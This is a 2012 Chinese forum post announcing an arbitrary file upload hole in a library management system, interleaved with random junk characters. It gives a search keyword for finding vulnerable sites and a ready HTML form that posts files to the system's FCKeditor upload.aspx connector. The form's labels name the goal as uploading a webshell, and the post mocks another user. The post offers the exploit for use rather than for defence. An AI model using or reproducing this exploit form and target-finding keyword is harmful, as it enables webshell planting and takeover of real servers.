主题:图书馆系统任意文件上传漏洞
6 s* P4 o. k7 u# L1 a: O1 O 作者:冰锋刺客
& D3 a" b% E: i6 G" ?- B 厂商:点击书(dianjishu.com)
" K$ }. T' {' `, i2 U( z 日期:2012-6-21
4 l1 `/ s' g; p/ r( n3 U * h4 \( v# i. n4 \: C1 D
I 概述
. F/ i( T6 w+ j. c x: u" \ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
0 x, O: n6 G, |; g II 简介
8 M6 z! U1 j% ]/ R0 b( Z 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"" O8 x; X' e$ v# s( d
补充一个漏洞
: Q6 S; I; x! Z <form id="frmUpload" enctype="multipart/form-data"' o1 x' C" ~8 ?: [8 D2 k! S
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
& N" ~ ~! E/ C# N2 }: C <input id="btnUpload" type="submit" value="操翻他">3 M, X* j$ ?0 ~$ Z" Y: @3 I% x* c
</form>
+ ?1 Z" Z: O' J/ S* S/ I9 x. l' U1 z" O 你们懂的0 X$ Z" G& S: u( [, `5 Y7 D2 {
那傻逼提供还需要改包.5 ^' \0 F# n5 [ b& z
自己看了下源代码发现fckeditor
: W; i8 Z; y1 c0 I" a 直接秒杀6 S6 Z) w% S9 |4 m2 `+ ]
|
发表于 2012-9-10 21:20:59
收藏
支持
反对